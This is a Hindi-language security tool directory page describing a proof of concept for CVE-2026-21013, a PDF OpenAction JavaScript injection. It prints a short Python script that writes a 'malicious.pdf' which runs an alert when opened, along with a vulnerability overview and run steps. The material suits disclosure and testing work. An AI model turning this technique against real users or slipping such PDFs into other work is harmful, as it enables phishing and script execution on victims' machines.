Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script — एक PDF उत्पन्न करता है जिसमें एम्बेडेड JavaScript होता है, जो CVE-2026-21013 का प्रदर्शन करता है — एक OpenAction इंजेक्शन जो असुरक्षित PDF रीडरों में स्क्रिप्ट निष्पादन की ओर ले जाता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब सुरक्षा
GitHubgeorge0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script

CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script

एक PDF उत्पन्न करता है जिसमें एम्बेडेड JavaScript होता है, जो CVE-2026-21013 का प्रदर्शन करता है — एक OpenAction इंजेक्शन जो असुरक्षित PDF रीडरों में स्क्रिप्ट निष्पादन की ओर ले जाता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
21 महीना पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-21013 – एम्बेडेड स्क्रिप्ट के माध्यम से PDF JavaScript इंजेक्शन

प्रोग्राम कोड (Python जो दुर्भावनापूर्ण PDF जनरेट करता है)

root@kitploit:~
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
    f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")

CVE-2026-21013 – OpenAction के माध्यम से PDF JavaScript इंजेक्शन

Severity: Medium

अवलोकन

एक PDF जनरेटर PDF फ़ाइल में एम्बेड करने से पहले उपयोगकर्ता द्वारा आपूर्ति की गई सामग्री को सैनिटाइज़ नहीं करता है। एक हमलावर /OpenAction JavaScript प्रविष्टि इंजेक्ट कर सकता है जो दस्तावेज़ खोलने पर निष्पादित होती है, जिससे वेब व्यूअर में क्रॉस-साइट स्क्रिप्टिंग या पूर्ण JS समर्थन वाले डेस्कटॉप रीडर में स्थानीय कोड निष्पादन हो सकता है।

भेद्यता विवरण

  • प्रकार: PDF इंजेक्शन / क्लाइंट-साइड कोड निष्पादन
  • प्रभाव: फ़िशिंग, क्रेडेंशियल चोरी, मैलवेयर वितरण।
  • मूल कारण: PDF लाइब्रेरी एस्केपिंग या सत्यापन के बिना हमलावर-नियंत्रित स्ट्रिंग्स को सीधे PDF संरचना में एम्बेड करती है।

शोषण प्रदर्शन

जनरेटर चलाएँ:

root@kitploit:~
python generate_pdf_js_inject.py

परिणामी malicious.pdf को ऐसे PDF रीडर में खोलें जो JavaScript का समर्थन करता है; एक अलर्ट बॉक्स दिखाई देगा।

टूल डाउनलोड करें